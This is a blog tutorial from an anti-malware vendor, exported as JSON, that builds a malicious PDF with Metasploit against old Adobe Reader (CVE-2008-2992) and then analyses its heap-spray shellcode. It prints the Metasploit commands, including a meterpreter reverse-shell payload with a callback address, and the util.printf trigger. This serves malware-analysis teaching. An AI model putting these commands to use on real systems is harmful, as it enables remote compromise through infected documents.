{"id":374,"date":"2015-09-17T07:52:07","date_gmt":"2015-09-17T07:52:07","guid":{"rendered":"http:\/\/www.adlice.com\/?p=374"},"modified":"2022-12-21T10:37:28","modified_gmt":"2022-12-21T10:37:28","slug":"infected-pdf-extract-payload","status":"publish","type":"post","link":"https:\/\/www.adlice.com\/de\/infected-pdf-extract-payload\/","title":{"rendered":"Infected PDF : How to Extract the payload ?"},"content":{"rendered":"\n<p><strong>Infected PDFs have always been a privileged way to infect users<\/strong> because this document format is very common and used by almost everyone. Moreover, it exists many ways to <strong>exploit Acrobat Reader vulnerabilities<\/strong> and it&#8217;s very stealth and elegant way to launch a malware.<\/p>\n\n\n\n<p>In this article, I will show you how easy it is to craft a malicious PDF with custom shellcode, and trigger a vulnerability to execute a payload. <strong>We will also analyse the malicious PDF<\/strong> to learn how the payload is stored, and how to extract it. <strong>This article is for research purpose only<\/strong>, don&#8217;t do bad things!<\/p>\n\n\n<div class=\"wp-block-ub-table-of-contents-block ub_table-of-contents\" id=\"ub_table-of-contents-da483892-1f3e-41d8-8cd3-36091b962438\" data-linktodivider=\"false\" data-showtext=\"show\" data-hidetext=\"hide\" data-scrolltype=\"auto\" data-enablesmoothscroll=\"false\" data-initiallyhideonmobile=\"false\" data-initiallyshow=\"true\"><div class=\"ub_table-of-contents-header-container\" style=\"\">\n\t\t\t<div class=\"ub_table-of-contents-header\" style=\"text-align: left; \">\n\t\t\t\t<div class=\"ub_table-of-contents-title\"><\/div>\n\t\t\t\t\n\t\t\t<\/div>\n\t\t<\/div><div class=\"ub_table-of-contents-extra-container\" style=\"\">\n\t\t\t<div class=\"ub_table-of-contents-container ub_table-of-contents-1-column \">\n\t\t\t\t<ul style=\"\"><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/infected-pdf-extract-payload\/#0-what-is-a-pdf-format-analysis\" style=\"\">What is a PDF ? Format Analysis<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/infected-pdf-extract-payload\/#1-metasploit-infected-pdf-creation\" style=\"\">Metasploit: Infected PDF creation<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/infected-pdf-extract-payload\/#2-execution-of-the-infected-pdf\" style=\"\">Execution of  the Infected PDF<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/infected-pdf-extract-payload\/#3-pdf-stream-dumper-infected-pdf-analysis\" style=\"\">PDF Stream Dumper: Infected PDF Analysis<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/de\/infected-pdf-extract-payload\/#4-links\" style=\"\">Links<\/a><\/li><\/ul>\n\t\t\t<\/div>\n\t\t<\/div><\/div>\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"0-what-is-a-pdf-format-analysis\"><br>What is a PDF ? Format Analysis<\/h4>\n\n\n\n<p><strong>PDF is object oriented format, defined by Adobe<\/strong>. This format describes a document organization, and preserves dependencies needed for the document (fonts, images, &#8230;). These objects are stored within the document as streams and most of the time encoded or compressed. Below is the overview of a classic PDF document. For more information, <a href=\"http:\/\/partners.adobe.com\/public\/developer\/tips\/topic_tip31.html\">please read Adobe&#8217;s specifications<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"725\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture6-2-1024x725.png\" alt=\"pdf format\" class=\"wp-image-375\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture6-2-1024x725.png 1024w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture6-2-300x212.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture6-2.png 1072w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"1-metasploit-infected-pdf-creation\"><br>Metasploit: Infected PDF creation<\/h4>\n\n\n\n<p><strong>We will create a fake PDF<\/strong> with <a href=\"http:\/\/www.metasploit.com\/\">metasploit<\/a>, containing an exploit attempt, as well as a custom payload (code to execute). <strong>The exploit is targeting a specific version of Adobe Reader<\/strong>, so we will need to make some archaeology and find an ancient Reader version (thanks to <a href=\"http:\/\/www.oldapps.com\/\">http:\/\/www.oldapps.com\/<\/a>) to install on the target machine.<\/p>\n\n\n\n<p>So, first, let&#8217;s make this PDF. <strong>We will make a infected PDF that just opens calculator<\/strong> (calc.exe) on the machine, just for demonstration. <strong>Open a metasploit console<\/strong> (installation of metasploit is not covered in this article) and type:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>use exploit\/windows\/fileformat\/adobe_utilprintf\nset FILENAME malicious.pdf\nset PAYLOAD windows\/exec\nset CMD calc.exe\nshow options\nexploit<\/code><\/pre>\n\n\n\n<p><br>This should look like this:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture7-1.png\"><img decoding=\"async\" width=\"1145\" height=\"684\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture7-1.png\" alt=\"metasploit malicious pdf\" class=\"wp-image-376\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture7-1.png 1145w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture7-1-300x179.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture7-1-1024x612.png 1024w\" sizes=\"(max-width: 1145px) 100vw, 1145px\" \/><\/a><\/figure>\n\n\n\n<p><strong>Copy the file that has just been created<\/strong> (here \/home\/osboxes\/.msf4\/local\/malicious.pdf) on a shared drive. You will need to feed your target machine with it.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"2-execution-of-the-infected-pdf\"><br>Execution of  the Infected PDF<\/h4>\n\n\n\n<p><strong>On the target machine, download and install a vulnerable Adobe Reader version<\/strong> (metasploit tells us it should be less than 8.1.2). I choose to <a href=\"http:\/\/www.oldapps.com\/adobe_reader.php?old_adobe=16\">install a 8.1.1 version<\/a>. Once installed, <strong>execute the malicious.pdf file<\/strong>. You should see a <strong>calculator being spawned<\/strong> from the Adobe Reader process. That&#8217;s the exploit.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture8-1.png\"><img decoding=\"async\" width=\"1057\" height=\"516\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture8-1.png\" alt=\"pdf infected\" class=\"wp-image-377\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture8-1.png 1057w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture8-1-300x146.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture8-1-1024x500.png 1024w\" sizes=\"(max-width: 1057px) 100vw, 1057px\" \/><\/a><\/figure>\n\n\n\n<p><strong>I&#8217;ve done another PDF but changed the payload slightly<\/strong>, just for fun:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>set PAYLOAD windows\/meterpreter\/reverse_tcp\nset LHOST 192.168.1.29\nset LPORT 4455<\/code><\/pre>\n\n\n\n<p><br>Here&#8217;s the result. <strong>Adobe Reader now has a backdoor<\/strong> (reverse shell) listening for commands.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture9.png\"><img decoding=\"async\" width=\"1116\" height=\"505\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture9.png\" alt=\"pdf launching backdoor\" class=\"wp-image-378\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture9.png 1116w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture9-300x136.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture9-1024x463.png 1024w\" sizes=\"(max-width: 1116px) 100vw, 1116px\" \/><\/a><\/figure>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"3-pdf-stream-dumper-infected-pdf-analysis\"><br>PDF Stream Dumper: Infected PDF Analysis<\/h4>\n\n\n\n<p>Played enough! Let&#8217;s see <strong>what&#8217;s inside that malicious PDF<\/strong>, and let&#8217;s try to <strong>extract the malicious payload<\/strong> (we&#8217;re still with the calc.exe PDF). First, we will need a tool called <a href=\"http:\/\/sandsprite.com\/blogs\/index.php?uid=7&amp;pid=57\">PDF Stream Dumper, so download it<\/a>. <strong>Load the malicious PDF with it<\/strong>, and take some time to familiarize yourself with the tool.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture10.png\"><img decoding=\"async\" width=\"925\" height=\"599\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture10.png\" alt=\"pdf stream dumper\" class=\"wp-image-379\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture10.png 925w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture10-300x194.png 300w\" sizes=\"(max-width: 925px) 100vw, 925px\" \/><\/a><\/figure>\n\n\n\n<p>We can start by checking if <strong>some exploit is detected<\/strong> by the tool using the <strong>&#8220;Exploit Scan&#8221; menu<\/strong>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Exploit CVE-2008-2992 Date:11.4.08 v8.1.2 - util.printf - found in stream: 6<\/code><\/pre>\n\n\n\n<p>Indeed, <strong>there&#8217;s an exploit hidden in stream 6<\/strong> (the one in blue on the capture). But let&#8217;s start by the beginning: when searching for exploits in a PDF, we most of the time encounter <a href=\"https:\/\/en.wikipedia.org\/wiki\/Heap_spraying\">heap spray<\/a> created by a <strong>Javascript code<\/strong>. That heap spray is used to <strong>push the payload on the heap, ready to be executed<\/strong> once the vulnerability has triggered. <strong>If you open Stream 1<\/strong>, you can see:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/Type\/Catalog\/Outlines 2 0 R\/Pages 3 0 R\/OpenAction 5 0 R<\/code><\/pre>\n\n\n\n<p>That we can translate to <strong>OpenAction on stream 5<\/strong>. Let&#8217;s move to stream 5:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/Type\/Action\/S\/JavaScript\/JS 6 0 R<\/code><\/pre>\n\n\n\n<p>Which says to <strong>execute Javascript located in stream 6<\/strong>. This stream shows plain Javascript, it&#8217;s time to open the <strong>&#8220;Javascript_UI&#8221; menu<\/strong>. We immediately recognize a big string hex encoded, and pushed into a variable for heap spray. <strong>This is our payload:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture11.png\"><img decoding=\"async\" width=\"1154\" height=\"745\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture11.png\" alt=\"pdf analysis\" class=\"wp-image-380\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture11.png 1154w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture11-300x194.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture11-1024x661.png 1024w\" sizes=\"(max-width: 1154px) 100vw, 1154px\" \/><\/a><\/figure>\n\n\n\n<p>Fortunately, we have tools to manipulate it, and understand what it does. <strong>Select the payload<\/strong> (the part between quotes), and <strong>open &#8220;Shellcode_analysis&#8221; menu<\/strong>. Then choose <strong>&#8220;scDbg &#8211; LibEmu Emulation&#8221;<\/strong>. You will get a new window will the <strong>shellcode decoded into bytes<\/strong> (you can even save it to file):<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png\"><img decoding=\"async\" width=\"1152\" height=\"745\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png\" alt=\"pdf shellcode analysis\" class=\"wp-image-381\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png 1152w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12-300x194.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12-1024x662.png 1024w\" sizes=\"(max-width: 1152px) 100vw, 1152px\" \/><\/a><\/figure>\n\n\n\n<p><strong>LibEmu is a library able to simulate a processor<\/strong>, it gives <strong>information about what the assembly code is trying to do<\/strong>. Just hit the <strong>&#8220;Launch&#8221; button<\/strong> and you will understand:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture13.png\"><img decoding=\"async\" width=\"506\" height=\"221\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture13.png\" alt=\"libemu capture\" class=\"wp-image-382\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture13.png 506w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture13-300x131.png 300w\" sizes=\"(max-width: 506px) 100vw, 506px\" \/><\/a><\/figure>\n\n\n\n<p>Here it is, we can clearly see the <strong>shellcode will just opens a calc.exe window and exits<\/strong>.<br><strong>Let&#8217;s redo the same analysis for the other malicious PDF<\/strong> (reverse shell):<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture14.png\"><img decoding=\"async\" width=\"613\" height=\"277\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture14.png\" alt=\"libemu capture\" class=\"wp-image-383\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture14.png 613w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture14-300x136.png 300w\" sizes=\"(max-width: 613px) 100vw, 613px\" \/><\/a><\/figure>\n\n\n\n<p>Uh, self explaining right? <strong>Shellcode is loading the library needed to manipulate sockets<\/strong> (ws2_32.dll), and <strong>tries to connect back to C&amp;C<\/strong>. I haven&#8217;t told about the exploit itself, <strong>it&#8217;s located at the end of the javascript code<\/strong> (like stated by Exploit search, &#8220;util.printf &#8211; found in stream: 6&#8221;). <strong>It&#8217;s exploiting a buffer overflow on printf function<\/strong> to execute arbitrary code (here, our heap-sprayed shellcode).<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>util.printf(\"%45000.45000f\", 0);<\/code><\/pre>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"4-links\"><br>Links<\/h4>\n\n\n\n<p>&#8211; <a href=\"http:\/\/www.sans.org\/reading-room\/whitepapers\/malicious\/owned-malicious-pdf-analysis-33443\">http:\/\/www.sans.org\/reading-room\/whitepapers\/malicious\/owned-malicious-pdf-analysis-33443<\/a><br>&#8211; <a href=\"http:\/\/www.oldapps.com\/adobe_reader.php\">http:\/\/www.oldapps.com\/adobe_reader.php<\/a><br>&#8211; <a href=\"http:\/\/contagiodump.blogspot.fr\/2010\/08\/malicious-documents-archive-for.html\">http:\/\/contagiodump.blogspot.fr\/2010\/08\/malicious-documents-archive-for.html<\/a><br>&#8211; <a href=\"http:\/\/contagiodump.blogspot.fr\/2013\/03\/16800-clean-and-11960-malicious-files.html\">http:\/\/contagiodump.blogspot.fr\/2013\/03\/16800-clean-and-11960-malicious-files.html<\/a><br>&#8211; <a href=\"http:\/\/eternal-todo.com\/blog\/cve-2011-2462-exploit-analysis-peepdf\">http:\/\/eternal-todo.com\/blog\/cve-2011-2462-exploit-analysis-peepdf<\/a><br>&#8211; <a href=\"http:\/\/resources.infosecinstitute.com\/analyzing-malicious-pdf\/\">http:\/\/resources.infosecinstitute.com\/analyzing-malicious-pdf\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Infected PDF: Extract the payload &#8211; Infected PDFs have always been a popular way to infect computers, learn how it malicious PDF files are built.<\/p>\n","protected":false},"author":1,"featured_media":381,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[36,84],"tags":[335,8,334,336,85],"class_list":["post-374","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-analysis","category-tutorial","tag-exploit","tag-malware","tag-metasploit","tag-pdf","tag-tutorial","category-36","category-84","description-off"],"views":16040,"yoast_score":65,"yoast_readable":30,"featured_image_src":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png","author_info":{"display_name":"tigzy","author_link":"https:\/\/www.adlice.com\/de\/author\/tigzy\/"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Infected PDF: How to Extract the Payload | Analysis \u2022 Adlice Software<\/title>\n<meta name=\"description\" content=\"Infected PDF have always been a popular way to infect computers. Learn how malicious PDF are made with metasploit, and analyse them.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Infected PDF: How to Extract the Payload | Analysis \u2022 Adlice Software\" \/>\n<meta property=\"og:description\" content=\"Infected PDF have always been a popular way to infect computers. Learn how malicious PDF are made with metasploit, and analyse them.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/\" \/>\n<meta property=\"og:site_name\" content=\"Adlice Software\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/RogueKiller\" \/>\n<meta property=\"article:published_time\" content=\"2015-09-17T07:52:07+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-12-21T10:37:28+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1152\" \/>\n\t<meta property=\"og:image:height\" content=\"745\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"tigzy\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:site\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"tigzy\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"6\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/\"},\"author\":{\"name\":\"tigzy\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\"},\"headline\":\"Infected PDF : How to Extract the payload ?\",\"datePublished\":\"2015-09-17T07:52:07+00:00\",\"dateModified\":\"2022-12-21T10:37:28+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/\"},\"wordCount\":823,\"commentCount\":1,\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png\",\"keywords\":[\"exploit\",\"malware\",\"metasploit\",\"pdf\",\"tutorial\"],\"articleSection\":[\"Analysis\",\"Tutorial\"],\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/\",\"url\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/\",\"name\":\"Infected PDF: How to Extract the Payload | Analysis \u2022 Adlice Software\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png\",\"datePublished\":\"2015-09-17T07:52:07+00:00\",\"dateModified\":\"2022-12-21T10:37:28+00:00\",\"description\":\"Infected PDF have always been a popular way to infect computers. Learn how malicious PDF are made with metasploit, and analyse them.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#primaryimage\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png\",\"width\":1152,\"height\":745},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.adlice.com\/de\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Infected PDF : How to Extract the payload ?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.adlice.com\/#website\",\"url\":\"https:\/\/www.adlice.com\/\",\"name\":\"Adlice Software\",\"description\":\"Anti-malware and analysis tools\",\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.adlice.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.adlice.com\/#organization\",\"name\":\"Adlice Software\",\"url\":\"https:\/\/www.adlice.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"width\":276,\"height\":276,\"caption\":\"Adlice Software\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/RogueKiller\",\"https:\/\/x.com\/AdliceSoftware\",\"https:\/\/fr.linkedin.com\/company\/adlice-software\",\"https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\",\"name\":\"tigzy\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"caption\":\"tigzy\"},\"description\":\"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.\",\"url\":\"https:\/\/www.adlice.com\/de\/author\/tigzy\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Infected PDF: How to Extract the Payload | Analysis \u2022 Adlice Software","description":"Infected PDF have always been a popular way to infect computers. Learn how malicious PDF are made with metasploit, and analyse them.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/","og_locale":"de_DE","og_type":"article","og_title":"Infected PDF: How to Extract the Payload | Analysis \u2022 Adlice Software","og_description":"Infected PDF have always been a popular way to infect computers. Learn how malicious PDF are made with metasploit, and analyse them.","og_url":"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/","og_site_name":"Adlice Software","article_publisher":"https:\/\/www.facebook.com\/RogueKiller","article_published_time":"2015-09-17T07:52:07+00:00","article_modified_time":"2022-12-21T10:37:28+00:00","og_image":[{"width":1152,"height":745,"url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png","type":"image\/png"}],"author":"tigzy","twitter_card":"summary_large_image","twitter_creator":"@AdliceSoftware","twitter_site":"@AdliceSoftware","twitter_misc":{"Verfasst von":"tigzy","Gesch\u00e4tzte Lesezeit":"6\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#article","isPartOf":{"@id":"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/"},"author":{"name":"tigzy","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d"},"headline":"Infected PDF : How to Extract the payload ?","datePublished":"2015-09-17T07:52:07+00:00","dateModified":"2022-12-21T10:37:28+00:00","mainEntityOfPage":{"@id":"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/"},"wordCount":823,"commentCount":1,"publisher":{"@id":"https:\/\/www.adlice.com\/#organization"},"image":{"@id":"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#primaryimage"},"thumbnailUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png","keywords":["exploit","malware","metasploit","pdf","tutorial"],"articleSection":["Analysis","Tutorial"],"inLanguage":"de"},{"@type":"WebPage","@id":"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/","url":"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/","name":"Infected PDF: How to Extract the Payload | Analysis \u2022 Adlice Software","isPartOf":{"@id":"https:\/\/www.adlice.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#primaryimage"},"image":{"@id":"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#primaryimage"},"thumbnailUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png","datePublished":"2015-09-17T07:52:07+00:00","dateModified":"2022-12-21T10:37:28+00:00","description":"Infected PDF have always been a popular way to infect computers. Learn how malicious PDF are made with metasploit, and analyse them.","breadcrumb":{"@id":"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.adlice.com\/infected-pdf-extract-payload\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#primaryimage","url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png","contentUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture12.png","width":1152,"height":745},{"@type":"BreadcrumbList","@id":"https:\/\/www.adlice.com\/infected-pdf-extract-payload\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.adlice.com\/de\/"},{"@type":"ListItem","position":2,"name":"Infected PDF : How to Extract the payload ?"}]},{"@type":"WebSite","@id":"https:\/\/www.adlice.com\/#website","url":"https:\/\/www.adlice.com\/","name":"Adlice Software","description":"Anti-malware and analysis tools","publisher":{"@id":"https:\/\/www.adlice.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.adlice.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/www.adlice.com\/#organization","name":"Adlice Software","url":"https:\/\/www.adlice.com\/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/","url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png","contentUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png","width":276,"height":276,"caption":"Adlice 